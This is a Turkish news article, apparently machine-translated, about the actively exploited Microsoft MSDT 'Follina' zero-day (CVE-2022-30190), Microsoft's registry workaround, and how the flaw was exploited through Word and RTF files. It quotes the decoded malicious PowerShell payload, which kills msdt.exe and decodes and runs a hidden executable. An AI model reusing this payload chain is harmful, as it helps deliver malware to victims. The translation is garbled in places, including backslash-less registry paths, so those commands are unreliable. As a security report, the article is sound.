Pazar, Eylül 8, 2024
Ana SayfaTeknoloji HaberleriWindows'ta 0 günlük kod yürütme, 7 haftadır etkin istismar altında

Windows’ta 0 günlük kod yürütme, 7 haftadır etkin istismar altında

SIFIR GÜN kelimesi, birler ve sıfırlarla dolu bir ekranın ortasında gizlidir.

Windows’un tüm desteklenen sürümlerinde sıfırıncı günde kritik bir kod yürütme, yedi haftadır aktif olarak istismar ediliyor ve saldırganlara Windows Defender’ı ve diğer uç nokta koruma ürünlerini tetiklemeden kötü amaçlı yazılım yüklemek için güvenilir bir araç sağlıyor.

Microsoft Destek Teşhis Aracı güvenlik açığı, 12 Nisan’da Microsoft’a, vahşi doğada zaten istismar edilmekte olan bir sıfır gün olarak bildirildi. Gölge Avcısı Grubu söz konusu üzerinde Twitter. A 21 Nisan tarihli cevapancak araştırmacılara Microsoft Güvenlik Yanıt Merkezi ekibinin bildirilen davranışı bir güvenlik açığı olarak görmediğini çünkü MSDT tanılama aracının yükleri yürütmeden önce bir parola gerektirdiğini söyledi.

boşver

Pazartesi günü, Microsoft, CVE-2022-30190 güvenlik açığı izleyicisi ile davranışı belirleyerek ve bildirilen davranışın sonuçta kritik bir güvenlik açığı oluşturduğu konusunda ilk kez uyararak kursu tersine çevirdi.

Danışma belgesinde, “MSDT, Word gibi bir çağrı uygulamasından URL protokolü kullanılarak çağrıldığında bir uzaktan kod yürütme güvenlik açığı oluşur.” “Bu güvenlik açığından başarıyla yararlanan bir saldırgan, çağıran uygulamanın ayrıcalıklarıyla rasgele kod çalıştırabilir. Saldırgan daha sonra programları yükleyebilir, verileri görüntüleyebilir, değiştirebilir veya silebilir ya da kullanıcı haklarının izin verdiği bağlamda yeni hesaplar oluşturabilir.”

Bu hikayenin yayınlandığı tarihte, Microsoft henüz bir yama yayınlamamıştı. Bunun yerine, müşterilere MSDT URL Protokolünü şu şekilde devre dışı bırakmalarını tavsiye ediyordu:

  1. Koşmak Komut istemi olarak yönetici.
  2. Kayıt defteri anahtarını yedeklemek için “reg export HKEY_CLASSES_ROOTms-msdt” komutunu çalıştırın. dosya adı
  3. “reg delete HKEY_CLASSES_ROOTms-msdt /f” komutunu yürütün

Başlangıçta Microsoft tarafından gözden kaçırılmış olsa da, bir araştırmacı tarafından yapılan incelemede güvenlik açığı tekrar fark edildi. bir Word belgesi belirledi Daha önce bilinmeyen saldırı vektöründen yararlanan Cuma günü VirusTotal’a yüklendi.

Araştırmacı Kevin Beaumont tarafından yapılan analize göre, belge uzak bir web sunucusundan bir HTML dosyasını almak için Word kullanıyor. Belge daha sonra PowerShell komutlarını yüklemek ve yürütmek için MSProtocol URI şemasını kullanır.

Beaumont, “Bu mümkün olmamalı,” diye yazdı.

Ne yazık ki, dır-dir mümkün.

Belgedeki komutların kodu çözüldüğünde, şu anlama gelirler:

$cmd = "c:windowssystem32cmd.exe";
Start-Process $cmd -windowstyle hidden -ArgumentList "/c taskkill /f /im msdt.exe";
Start-Process $cmd -windowstyle hidden -ArgumentList "/c cd C:userspublic&&for /r
%temp% %i in (05-2022-0438.rar) do copy %i 1.rar /y&&findstr TVNDRgAAAA 1.rar>1.t&&certutil -decode 1.t 1.c &&expand 1.c -F:* .&&rgb.exe";

Güvenlik firması Huntress’ten araştırmacı John Hammond’a göre senaryo:

  • Gizli pencereleri şu amaçlarla başlatır:
    • Çalışıyorsa msdt.exe’yi öldürün
    • Kodlanmış bir CAB dosyası için bir Base64 dizesi arayarak bir RAR dosyası içindeki dosyalar arasında dolaşın
      • Bu Base64 kodlu CAB dosyasını şu şekilde saklayın: 1.t
      • olarak kaydedilecek Base64 kodlu CAB dosyasının kodunu çözün. 1.c
      • Genişletin 1.c CAB dosyasını geçerli dizine ekleyin ve son olarak:
      • Uygulamak rgb.exe (muhtemelen 1.c CAB dosyası içinde sıkıştırılmıştır)

Beaumont, Ağustos 2020’de kodu yürütmek için MSDT’nin nasıl kullanılacağını gösteren bu akademik makaleye de dikkat çekti. Bu, şirketin güvenlik ekibinin bu davranışın kötü niyetli olarak istismar edilme potansiyelini kavrayamadığı en az bir kez daha olduğunu gösteriyor.

Hayır, Korumalı Görünüm sizi kurtarmaz

Normalde Word, makroları ve diğer potansiyel olarak zararlı işlevleri devre dışı bırakan bir mod olan korumalı görünüm olarak bilinen modda İnternet’ten indirilen içeriği yükleyecek şekilde ayarlanmıştır. Beaumont, net olmayan nedenlerden dolayı, belge bir Zengin Metin Biçimi dosyası olarak yüklenirse, “Korumalı Görünüm bir yana, belgeyi açmadan bile (Explorer’daki önizleme sekmesi aracılığıyla) çalıştığını söyledi.

Başka bir deyişle, Huntress araştırmacıları, RTF dosyasının “sadece Windows Gezgini’ndeki Önizleme Bölmesi ile bu istismarın başlatılmasını tetikleyebileceğini” yazdı. Bunu yaparken, “bu, istismar için yalnızca ‘tek tıklama’ ile değil, potansiyel olarak bir ‘sıfır tıklama’ tetikleyicisiyle de bu tehdidin ciddiyetini artırır.”

Cuma günü VirusTotal’a yüklenen belgenin yanı sıra araştırmacılar, 12 Nisan’da yüklenen ve aynı sıfır gününden yararlanan ayrı bir Word dosyası ortaya çıkardı.

Bu yama uygulanmamış güvenlik açığının önem derecesi göz önüne alındığında, Microsoft Office’e güvenen kuruluşlar, bunun ağlarını nasıl etkilediğini kapsamlı bir şekilde araştırmalıdır. MSDT URL Protokolünü devre dışı bırakmanın kısa vadede ve muhtemelen uzun vadede büyük kesintiler yaratması olası değildir. Office kullanıcıları, araştırma sırasında (en azından Microsoft daha fazla ayrıntı ve rehberlik yayınlayana kadar) protokolü tamamen kapatmalı ve İnternet üzerinden indirilen tüm belgeleri ek inceleme yapmalıdır.

RELATED ARTICLES

Popüler Konular